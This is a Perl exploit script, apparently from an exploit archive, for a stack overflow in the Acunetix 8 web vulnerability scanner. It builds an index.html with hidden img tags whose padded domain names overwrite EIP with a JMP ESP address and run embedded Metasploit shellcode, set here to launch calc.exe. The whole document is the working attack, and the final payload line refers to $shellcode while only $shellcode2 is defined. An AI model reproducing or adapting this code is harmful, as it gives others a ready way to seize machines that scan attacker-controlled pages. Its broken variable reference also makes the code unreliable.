# Exploit Title: Acunetix Stack Based overflow
# Date: 24/04/14
# Exploit Author: Danor Cohen (An7i) - http://an7isec.blogspot.co.il/2014/04/pown-noobs-acunetix-0day.html
# Vendor Homepage: http://www.acunetix.com/
# Software Link: http://www.acunetix.com/vulnerability-scanner/download/
# Version: 8 build 20120704
# Tested on: XP
#
# http://www.reddit.com/r/netsec/comments/23tbn6/pwn_the_n00bs_acunetix_0day/
#
#This exploit generates HTML file, if this HTML will be scanned with ACUNETIX, shell will be executed.
my
$file
=
"index.html"
;
my
$HTMLHeader1
=
"<html>\r\n"
;
my
$HTMLHeader2
=
"\r\n</html>"
;
my
$IMGheader1
=
"<img style=\"opacity:0.0;filter:alpha(opacity=0);\" src=http://"
;
my
$IMGheader2
=
"><br>\n"
;
my
$DomainName1
=
"XSS"
;
my
$DomainName2
=
"CSRF"
;
my
$DomainName3
=
"DeepScan"
;
my
$DomainName4
=
"NetworkScan"
;
my
$DomainName5
=
"DenialOfService"
;
my
$GeneralDotPadding
=
"."
x 190;
my
$ExploitDomain
=
"SQLInjection"
;
my
$DotPadding
=
"."
x (202-
length
(
$ExploitDomain
));
my
$Padding1
=
"A"
x66;
my
$Padding2
=
"B"
x4;
my
$FlowCorrector
=
"500f"
;
#0x66303035 : readable memory location for fixing the flow
my
$EIPOverWrite
=
"]Qy~"
;
#0x7e79515d (JMP ESP from SXS.DLL).
# windows/exec - 461 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_upper
# VERBOSE=false, PrependMigrate=false, EXITFUNC=thread,
# CMD=calc.exe
my
$shellcode2
=
"\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a"
.
"\x56\x54\x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48"
.
"\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51"
.
"\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43"
.
"\x4a\x4a\x49\x4b\x4c\x5a\x48\x4b\x39\x33\x30\x45\x50\x53"
.
"\x30\x33\x50\x4c\x49\x4a\x45\x46\x51\x48\x52\x52\x44\x4c"
.
"\x4b\x36\x32\x50\x30\x4c\x4b\x51\x42\x34\x4c\x4c\x4b\x51"
.
"\x42\x35\x44\x4c\x4b\x52\x52\x37\x58\x54\x4f\x48\x37\x51"
.
"\x5a\x57\x56\x50\x31\x4b\x4f\x46\x51\x4f\x30\x4e\x4c\x37"
.
"\x4c\x45\x31\x33\x4c\x45\x52\x36\x4c\x47\x50\x59\x51\x58"
.
"\x4f\x54\x4d\x53\x31\x49\x57\x4d\x32\x4c\x30\x50\x52\x46"
.
"\x37\x4c\x4b\x31\x42\x44\x50\x4c\x4b\x30\x42\x57\x4c\x45"
.
"\x51\x4e\x30\x4c\x4b\x57\x30\x34\x38\x4b\x35\x59\x50\x42"
.
"\x54\x31\x5a\x53\x31\x48\x50\x36\x30\x4c\x4b\x37\x38\x52"
.
"\x38\x4c\x4b\x46\x38\x51\x30\x43\x31\x49\x43\x4a\x43\x47"
.
"\x4c\x47\x39\x4c\x4b\x56\x54\x4c\x4b\x45\x51\x48\x56\x36"
.
"\x51\x4b\x4f\x56\x51\x39\x50\x4e\x4c\x39\x51\x38\x4f\x54"
.
"\x4d\x43\x31\x49\x57\x56\x58\x4b\x50\x43\x45\x4a\x54\x35"
.
"\x53\x53\x4d\x4b\x48\x57\x4b\x43\x4d\x57\x54\x34\x35\x5a"
.
"\x42\x31\x48\x4c\x4b\x56\x38\x37\x54\x33\x31\x48\x53\x32"
.
"\x46\x4c\x4b\x34\x4c\x50\x4b\x4c\x4b\x56\x38\x35\x4c\x43"
.
"\x31\x58\x53\x4c\x4b\x43\x34\x4c\x4b\x43\x31\x4e\x30\x4b"
.
"\x39\x51\x54\x31\x34\x56\x44\x51\x4b\x51\x4b\x43\x51\x36"
.
"\x39\x51\x4a\x30\x51\x4b\x4f\x4b\x50\x50\x58\x51\x4f\x30"
.
"\x5a\x4c\x4b\x54\x52\x4a\x4b\x4b\x36\x31\x4d\x33\x5a\x53"
.
"\x31\x4c\x4d\x4b\x35\x4f\x49\x55\x50\x35\x50\x35\x50\x46"
.
"\x30\x42\x48\x36\x51\x4c\x4b\x32\x4f\x4b\x37\x4b\x4f\x58"
.
"\x55\x4f\x4b\x4b\x50\x45\x4d\x36\x4a\x34\x4a\x43\x58\x4e"
.
"\x46\x4d\x45\x4f\x4d\x4d\x4d\x4b\x4f\x39\x45\x57\x4c\x43"
.
"\x36\x43\x4c\x44\x4a\x4d\x50\x4b\x4b\x4d\x30\x42\x55\x34"
.
"\x45\x4f\x4b\x30\x47\x54\x53\x34\x32\x42\x4f\x52\x4a\x33"
.
"\x30\x51\x43\x4b\x4f\x59\x45\x45\x33\x33\x51\x52\x4c\x35"
.
"\x33\x46\x4e\x35\x35\x53\x48\x52\x45\x45\x50\x41\x41"
;
my
$FinalDomainName1
=
$IMGheader1
.
$DomainName1
.
$GeneralDotPadding
.
$IMGheader2
;
my
$FinalDomainName2
=
$IMGheader1
.
$DomainName2
.
$GeneralDotPadding
.
$IMGheader2
;
my
$FinalDomainName3
=
$IMGheader1
.
$DomainName3
.
$GeneralDotPadding
.
$IMGheader2
;
my
$FinalDomainName4
=
$IMGheader1
.
$DomainName4
.
$GeneralDotPadding
.
$IMGheader2
;
my
$FinalDomainName5
=
$IMGheader1
.
$DomainName5
.
$GeneralDotPadding
.
$IMGheader2
;
my
$FinalExploitDomain
=
$IMGheader1
.
$ExploitDomain
.
$DotPadding
.
$Padding1
.
$FlowCorrector
.
$Padding2
.
$EIPOverWrite
.
$shellcode
.
$IMGheader2
;
open
(
$FILE
,
">$file"
);
print
$FILE
$HTMLHeader1
.
$FinalDomainName1
.
$FinalDomainName2
.
$FinalDomainName3
.
$FinalDomainName4
.
$FinalDomainName5
.
$FinalExploitDomain
.
$HTMLHeader2
;
close
(
$FILE
);
print
"Acunetix Killer File Created successfully\n"
;